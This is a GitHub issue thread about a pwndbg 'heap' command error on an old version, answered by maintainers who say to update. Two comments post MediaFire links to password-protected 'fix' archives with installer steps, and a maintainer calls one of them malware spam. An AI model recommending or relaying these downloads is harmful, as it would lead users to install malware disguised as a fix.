### ISSUE TITLE
heap command on multi thread

### ISSUE THREAD

**Issue by guard-wait** [pwndbg/pwndbg#2394]
hello,sir.when I use pwndbg to debug one program.I got this problem:

```
pwndbg> heap
'heap': Iteratively print chunks on a heap, default to the current thread's active heap.
Exception occurred: heap: Could not convert Python object: None. (<class 'TypeError'>)
For more info invoke `set exception-verbose on` and rerun the command
or debug it by yourself with `set exception-debugger on`
pwndbg> version 
Gdb:      9.2
Python:   3.8.10 (default, Nov 22 2023, 10:22:35)  [GCC 9.4.0]
Pwndbg:   1.1.0 build: 3e31bbe
Capstone: 4.0.1024
Unicorn:  1.0.2
pwndbg> 
```

so I wanna know whether pwndbg supports multithreaded debugging

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by guard-wait** [comment]
> 下载 https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。

what?

**Comment by guard-wait** [comment]
pwndbg> set exception-debugger on
Set whether to debug exceptions raised in Pwndbg commands to True
pwndbg> heap
'heap': Iteratively print chunks on a heap, default to the current thread's active heap.
Traceback (most recent call last):
  File "/root/pwndbg/pwndbg/commands/__init__.py", line 131, in __call__
    return self.function(*args, **kwargs)
  File "/root/pwndbg/pwndbg/commands/__init__.py", line 225, in _OnlyWhenRunning
    return function(*a, **kw)
  File "/root/pwndbg/pwndbg/commands/__init__.py", line 263, in _OnlyWithLibcDebugSyms
    return function(*a, **kw)
  File "/root/pwndbg/pwndbg/commands/__init__.py", line 243, in _OnlyWhenHeapIsInitialized
    return function(*a, **kw)
  File "/root/pwndbg/pwndbg/commands/heap.py", line 104, in heap
    heap_region = allocator.get_heap_boundaries(addr)
  File "/root/pwndbg/pwndbg/heap/ptmalloc.py", line 354, in get_heap_boundaries
    region = self.get_region(addr) if addr else self.get_region(self.get_arena()['top'])
  File "/root/pwndbg/pwndbg/heap/ptmalloc.py", line 322, in get_arena
    arena_addr = pwndbg.memory.u(pwndbg.symbol.address('thread_arena'))
  File "/root/pwndbg/pwndbg/memory.py", line 239, in u
    return {
  File "/root/pwndbg/pwndbg/memory.py", line 227, in u64
    return readtype(pwndbg.typeinfo.uint64, addr)
  File "/root/pwndbg/pwndbg/memory.py", line 83, in readtype
    return int(gdb.Value(addr).cast(gdb_type.pointer()).dereference())
TypeError: Could not convert Python object: None.

If that is an issue, you can report it on https://github.com/pwndbg/pwndbg/issues
(Please don't forget to search if it hasn't been reported before)
To generate the report and open a browser, you may run `bugreport --run-browser`
PS: Pull requests are welcome
> /root/pwndbg/pwndbg/memory.py(83)readtype()
-> return int(gdb.Value(addr).cast(gdb_type.pointer()).dereference())
(Pdb)

**Comment by lebr0nli** [comment]
> so I wanna know whether pwndbg supports multithreaded debugging

pwndbg actually supported debugging the heap of multi-threaded programs, at least for the glibc that have debug symbols.
(Even without debug symbols, pwndbg can do some basic analysis with some heuristics, though not very perfect.)

If I understand correctly, seems like the pwndbg version you used is quite old (https://github.com/pwndbg/pwndbg/commit/3e31bbea8685993f4cb87322ddcfa4de4a9f269e), could you please update your pwndbg and try again?

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by disconnect3d** [comment]
(Fwiw I removed the spam comment with malware link and edited some posts here to enhance readability).

Please update Pwndbg to the latest version. As @lebr0nli said, the heap commands should work fine on the latest version with multithreaded applications assuming you want to inspect glibc heap :).

If that is not the case, please open another issue with infromation that would allow us to reproduce the issue.
